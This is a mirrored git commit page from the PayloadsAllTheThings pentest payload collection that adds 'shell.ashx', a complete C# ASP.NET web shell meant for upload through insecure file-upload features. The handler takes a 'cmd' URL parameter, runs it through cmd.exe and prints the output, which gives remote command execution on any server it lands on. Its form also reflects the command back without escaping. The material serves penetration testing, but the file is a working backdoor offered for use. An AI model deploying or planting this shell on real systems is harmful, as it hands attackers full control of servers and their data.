mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
commit
4f89c0a6d2
42
Upload Insecure Files/Extension ASP/shell.ashx
Normal file
42
Upload Insecure Files/Extension ASP/shell.ashx
Normal file
@ -0,0 +1,42 @@
|
||||
<% @ webhandler language="C#" class="AverageHandler" %>
|
||||
|
||||
using System;
|
||||
using System.Web;
|
||||
using System.Diagnostics;
|
||||
using System.IO;
|
||||
|
||||
public class AverageHandler : IHttpHandler
|
||||
{
|
||||
/* .Net requires this to be implemented */
|
||||
public bool IsReusable
|
||||
{
|
||||
get { return true; }
|
||||
}
|
||||
|
||||
/* main executing code */
|
||||
public void ProcessRequest(HttpContext ctx)
|
||||
{
|
||||
Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
|
||||
string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
|
||||
|
||||
ctx.Response.Write("<form method='GET'>Command: <input name='cmd' value='"+command+"'><input type='submit' value='Run'></form>");
|
||||
ctx.Response.Write("<hr>");
|
||||
ctx.Response.Write("<pre>");
|
||||
|
||||
/* command execution and output retrieval */
|
||||
ProcessStartInfo psi = new ProcessStartInfo();
|
||||
psi.FileName = "cmd.exe";
|
||||
psi.Arguments = "/c "+command;
|
||||
psi.RedirectStandardOutput = true;
|
||||
psi.UseShellExecute = false;
|
||||
Process p = Process.Start(psi);
|
||||
StreamReader stmrdr = p.StandardOutput;
|
||||
string s = stmrdr.ReadToEnd();
|
||||
stmrdr.Close();
|
||||
|
||||
ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
|
||||
ctx.Response.Write("</pre>");
|
||||
ctx.Response.Write("<hr>");
|
||||
ctx.Response.Write("By <a href='http://www.twitter.com/Hypn'>@Hypn</a>, for educational purposes only.");
|
||||
}
|
||||
}
|
Loading…
Reference in New Issue
Block a user